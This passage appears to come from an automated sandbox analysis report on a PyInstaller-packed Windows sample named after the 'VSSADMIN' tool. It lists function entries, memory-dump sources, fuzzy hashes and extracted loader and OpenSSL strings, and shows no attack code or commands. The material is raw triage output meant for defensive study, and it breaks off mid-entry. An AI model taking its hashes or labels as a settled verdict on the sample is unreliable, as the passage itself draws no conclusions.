                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastbind
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_sock2.c
                                                                                                                                                                      • API String ID: 2328862993-3200932406
                                                                                                                                                                      • Opcode ID: 769c29d007f33f69811d41728ff054719c46503b891464c8ad49b5064c10f0e6
                                                                                                                                                                      • Instruction ID: c74d6401c82730f6f899e7cb00cb27f34f0968bbe0e7749beef81fbaf2795edc
                                                                                                                                                                      • Opcode Fuzzy Hash: 769c29d007f33f69811d41728ff054719c46503b891464c8ad49b5064c10f0e6
                                                                                                                                                                      • Instruction Fuzzy Hash: D421CD72B0821A86E714DB26F8606AD7760FB80B98F400635EB9D43BD9DF3DE9559B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF4246 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
                                                                                                                                                                      • Instruction ID: 16075fe6d6d8b8483d344ba2f931c62f5eb61ece27789cd7de5e838f743fb341
                                                                                                                                                                      • Opcode Fuzzy Hash: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
                                                                                                                                                                      • Instruction Fuzzy Hash: E4F0BE323682A505CB99CA36B448FAD6ED59391BC9F22C030EA0CC3F55E92EC601CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF5731 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
                                                                                                                                                                      • Instruction ID: eeaf4836678b8b6a304919c63ceb6be758e64cbe88196c4ace8b54458b72a233
                                                                                                                                                                      • Opcode Fuzzy Hash: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 40E0DF727583A845C75ACA333118E6DAB90A754B89F43C030DA0EC3F46EC2EC601DB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C73E10 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                      • API String ID: 190572456-3109299426
                                                                                                                                                                      • Opcode ID: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                      • Instruction ID: 820fcf5087af11d6701d077da3f7f76edcc49149595e5afffe47fb918676a7f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                      • Instruction Fuzzy Hash: 46423564A0EF47B2EE558B08E9D117422B2BF46FB9B946037C40E87364FF7EA559C200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C75F70 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                      • API String ID: 190572456-2208601799
                                                                                                                                                                      • Opcode ID: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction ID: cc77478cef4e4865c127855ced30ecffb89254863447c57f9a8509bea91ed954
                                                                                                                                                                      • Opcode Fuzzy Hash: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction Fuzzy Hash: E4E18564A0DF43A2FE558B18F9D017423B5AF17FB9BC46037C84E87664EF7EA5588201
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF1C1C Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 267COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
                                                                                                                                                                      • API String ID: 3568877910-3630080479
                                                                                                                                                                      • Opcode ID: cb09d76981884f911073ec79770a94529b3f76ec59753b3682a11d1b1a51dff2
                                                                                                                                                                      • Instruction ID: b06032287b734661b633492b38e9e5e878e76ad82238964c7e181ceaa8d257ae
                                                                                                                                                                      • Opcode Fuzzy Hash: cb09d76981884f911073ec79770a94529b3f76ec59753b3682a11d1b1a51dff2
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BC19BA2B4C74A81EE68EB21A4A06BD6391AF81784F449036DF0D07786EF3DF545FB41
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF4E44 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 205registryfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
                                                                                                                                                                      • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                                                                                                                                      • API String ID: 1270133462-2963566556
                                                                                                                                                                      • Opcode ID: 75131406242315063b9eb8b61f751d263e868ede2efdb133bf2f38d68100ef13
                                                                                                                                                                      • Instruction ID: fb691c9021c1b0dfbaeb33edde8e1710eb004080f9c02d8589ba263c4f07db13
                                                                                                                                                                      • Opcode Fuzzy Hash: 75131406242315063b9eb8b61f751d263e868ede2efdb133bf2f38d68100ef13
                                                                                                                                                                      • Instruction Fuzzy Hash: 1691CF73B08B8A86EB248F24E8A45AD7760FB45B94F404736EB5D07A95EF3CE255D300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                      • API String ID: 0-666925554
                                                                                                                                                                      • Opcode ID: 41c0502262cf3944fd249ac30d9296d3fd4dc7e2994cda9a83d5d30045412d46
                                                                                                                                                                      • Instruction ID: 002627bfc82ce9889b8d8cd2fb871a574f5cee74e2ef7071d5e6b6c9794b3c83
                                                                                                                                                                      • Opcode Fuzzy Hash: 41c0502262cf3944fd249ac30d9296d3fd4dc7e2994cda9a83d5d30045412d46
                                                                                                                                                                      • Instruction Fuzzy Hash: FC51AC61B0CE8292EA109B15E4D56B963B2AF86FF9F444133DE0D87796EE3EE5458300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C778D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00007FF614C7687A,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77910
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77921
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77943
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7794D
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7798A
                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF614C7799C
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779B4
                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779E6
                                                                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF614C77A0D
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77A1E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
